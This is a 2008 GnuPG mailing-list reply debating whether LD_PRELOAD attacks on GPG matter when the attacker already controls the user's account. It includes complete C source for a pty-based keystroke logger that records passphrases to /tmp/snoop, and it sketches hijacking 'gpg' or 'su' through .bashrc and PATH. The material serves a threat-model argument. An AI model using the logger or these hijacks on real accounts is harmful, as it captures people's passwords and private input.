LD_PRELOAD attack

David Shaw dshaw at jabberwocky.com
Thu Jun 12 01:02:00 CEST 2008


On Wed, Jun 11, 2008 at 04:31:45PM -0400, michael graffam wrote:
> On Wed, Jun 11, 2008 at 3:56 PM, David Shaw <dshaw at jabberwocky.com> wrote:
> 
> > If the attacker had access to your machine to implement the LD_PRELOAD
> > attack, there are literally dozens of ways they can similarly steal
> > whatever data they are trying to steal.  Why do a very complex attack
> > involving replacing libraries when they could just replace the GPG
> > binary itself?
> 
> 
> Replacing the GPG bin requires root. An LD_PRELOAD'ed lib doesn't.

Try it.  I don't have to replace it for everyone - just you, and if I
can write to your computer, I can make you run any binary I want.
Remember, you own your own shell .rc file.

>  Or add a shell script named 'gpg' and put it in your
> > search path ahead of the real gpg?
> 
> 
> Again,  root.

Again, .bashrc.

> > Or turn on typescript by default.
> 
> 
> Doesn't save GPG passphrases.

Why would I care about getting your passphrase if I can get everything
you typed into the message before it was encrypted?

Still, just for laughs, here's a hack that will save everything typed
on a particular terminal, including passphrases (real error checking
and proper handling of sigchld left up to the reader):

#include <stdio.h>
#include <pty.h>
#include <unistd.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int
main(int argc,char *argv[])
{
  int master,slave,snoop;
  pid_t pid;
  char byte;
  
  snoop=open("/tmp/snoop",O_WRONLY|O_CREAT|O_TRUNC,0666);

  pid=fork();
  if(pid)
    {
      struct termios term;

      tcgetattr(0,&term);
      cfmakeraw(&term);
      term.c_lflag&=~ECHO;
      tcsetattr(0,TCSAFLUSH,&term);
      close(slave);

      for(;;)
	{
	  if(read(0,&byte,1)==1)
	    {
	      write(master,&byte,1);
	      write(snoop,&byte,1);
	    }
	}
    }
  else
    {
      pid=fork();
      if(pid)
	{
	  close(slave);
	  for(;;)
	    {
	      if(read(master,&byte,1)==1)
		write(1,&byte,1);
	    }
	}
      else
	{
	  setsid();
	  close(master);
	  dup2(slave,0);
	  dup2(slave,1);
	  dup2(slave,2);
	  close(slave);
      
	  execl("/bin/bash","/bin/bash","-i",NULL);
	}
    }

  return 0;
}

> > Or load a kernel module that changes the meaning of system calls.  Or
> > replace the rng with one that isn't random.  Or, or, or.
> 
> 
> Root, root, root.

Do you seriously think that someone who can write to your user-level
account can't get root pretty soon?  This can be as complex as reading
bugtraq for a while until a buffer overrun comes along, or as simple
as arranging for "su" to go somewhere else.

> Get it yet? LD_PRELOAD enables attacks against GPG w/o requiring full access
> to the box. The attacker just need access to the user's account.

I do get it.  I'm not convinced that you do.

If an attacker has access to the user's account, it's game over.  At
that point, it's just a question which particular method the attacker
will choose to completely own you.

David



More information about the Gnupg-users mailing list